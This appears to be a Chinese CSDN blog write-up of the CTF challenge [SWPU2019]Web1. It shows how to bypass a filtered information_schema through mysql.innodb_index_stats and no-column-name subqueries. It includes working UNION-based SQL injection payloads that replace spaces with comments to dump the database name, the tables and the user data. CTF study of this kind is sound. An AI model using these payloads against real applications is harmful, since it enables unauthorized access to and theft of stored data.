[SWPU2019]Web1 sql注入过滤了information 无列名查询

最新推荐文章于 2024-06-14 12:07:38 发布
最新推荐文章于 2024-06-14 12:07:38 发布
阅读量373 收藏
点赞数
分类专栏: BUUctf SQL注入 文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133043903
版权

记录一道过滤 or 导致无法使用 information_schema.tables的题目

前置知识

过滤information

在sql的时候其实很想知道 如果information_schmea.tables被过滤 那我是不是就完全sql不来了

这里就遇到了

主要是 mysql中还存在着其他的表可以查询

例如 mysql数据库中的 innodb_index_stats

还有sys数据库中的schema_auto_increment_columns

但是这个题目不存在

所以我们还是使用mysql.innodb_index_stats

无列名查询

因为mysql.innodb_index_stats不存在列名 所以我们只能通过无列明查询

其实这个我们在sql注入已经会了 就是select 1,2,3,4

但是意义不一样

我们来看看

之前判断字段是无法回显字符的

我们把它作为一个表来返回

这里通过联合查询 就可以将 数据返回

但是我们有的时候只需要其中一个 我们就可以将其作为一个表 然后去查询他

例如

这样我们就取得了 第二列的数据了

个人觉得还是很好理解的

做题

首先我们得到了这个网站

想去试试弱口令 无果

只能通过注册去注册一个了

只存在两个功能点 一个是发布公告

我们去看看有什么用处

发现发布后可以进行查看详情 查询

那我们是不是可以通过sql来(这里是看wp的 思维跳跃太大了没想到是sql注入)

发现过滤了 空格 我们直接/**/绕过

确定了是sql注入 但是没有实现闭合 我们研究了一下 是最后还有个单引号 所以我们在最后加一个单引号让他为空字符

报错说字段错误 我们就开始尝试了

经过尝试

22个字段 真的多。。。。。

1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

我们可以开始查询了

爆数据库

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

爆破表

1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_index_stats/**/where/**/database_name="web1"'

爆破值 (无列名查询)

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

这样就爆破出了值了

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
-------已搬运------SQL注入过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1554
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
information_schema过滤与无注入
snowlyzz的博客
09-06 1251
information_schema过滤与无注入
WEB—无注入过滤information_schema
sGanYu
11-09 2703
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入 知识点 无注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】 发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB 继续注入,发布一个广告名为:.
ctfshow web 14 sql注入
m0_46412682的博客
07-16 407
ctfshow web 14 sql注入 开始的页面是一段代码: 这是get传参,/?c=1 sleep一秒后输出$url /?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现 @A@here_1s_your_f1ag.php@A@ 那打开这个文件,这是一个查询的页面 输入1回显是admin,url中可能存在sql注入 按F12查看源代码过滤了/information_schema.tables|information_schema.colum
BUUCTF:[GYCTF2020]Ezsqli --过滤information_schem ------ 无注入过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1332
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
仅作备份
swpu前端实验4的实验
04-23
swpu
[SWPUCTF 2021 新生赛]traditional
03-15
SWPUCTF 2021 新生赛的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5672
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
CISP-PTE SQL注入 进阶篇 Bypass绕过技巧
beirry的博客
04-15 3778
相信大家看完入门篇后,基本掌握了SQL注入的语法,那么这章主要讲下Bypass的绕过技巧 过滤引号 当注入过滤引号时,我们可以用Hex encoding或者CHAR() Function绕过 假设有一个查询语句为select * from user where id='[我们输入的值]'; Hex encoding 原查询语句select * from user where id=‘0x312723’; 解析为select * from user where id=‘1’#'; CHAR() Functi
Oracle中如何定义定时器
codemami的博客
06-12 570
在上述示例中,MY_PROGRAM是程序名,MY_SCHEDULE是调度名,MY_JOB是作业名。提交作业后,可以使用DBMS_JOB.RUN过程来手动运行作业,或者等待作业在指定的时间自动运行。start_date指定了作业的开始时间,repeat_interval指定了作业的重复执行规则。Oracle定时器是一种工具,用于在指定的时间间隔或特定时间自动执行数据库任务或存储过程。program_action字段中填写的是你的PL/SQL代码或存储过程的名称。作业定义了要执行的程序和使用的调度。
MySQL数据库(二)和java复习
sin1810335764的博客
06-10 1073
(接口可以理解为一种特殊的类,里面全部是由。
Oracle proc环境怎么搭建
codemami的博客
06-10 522
Oracle官方文档:Oracle官方提供了详细的PROC开发文档和示例代码,可以查阅以获取更多信息和帮助。安装Oracle数据库:确保已安装Oracle数据库,并配置好相应的环境变量,如ORACLE_HOME。作用:通过PROC,开发者可以在C语言程序中直接操作Oracle数据库,实现数据库访问和操作的功能。编译PROC程序:使用Oracle PROC预编译器编译PROC程序,生成C语言源代码文件(.c)。定义:Oracle PROC是Oracle的预编译器,用于将SQL语句嵌入到C语言程序中。
Oracle 19C 数据库表被误删除的模拟恢复
Ahern_的博客
06-13 783
Oracle 19C 数据库表被误删除的模拟恢复操作。4、基于时间点通过RMAN恢复被删除的表。5、RMAN成功后查询并验证表是否恢复。2、记录当前状态下数据库的时间。经过验证被误删除的表成功恢复。1、模拟创建表用于恢复测试。3、模拟表被误操作永久删除。
Android Room数据库使用介绍
最新发布
WriteBug001的博客
06-14 937
Room是Google提供的Android架构组件之一,旨在简化数据库操作。它是SQLite的一个抽象层,提供了更易用和安全的API。// tableName 指定了数据库中对应的表名为 "users"。如果不指定,默认使用类名作为表名// 使用默认值 0,autoGenerate = true 表示自动生成主键// 如果不使用 @ColumnInfo 注解,默认情况下 Room 将使用属性名作为数据库中的名。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值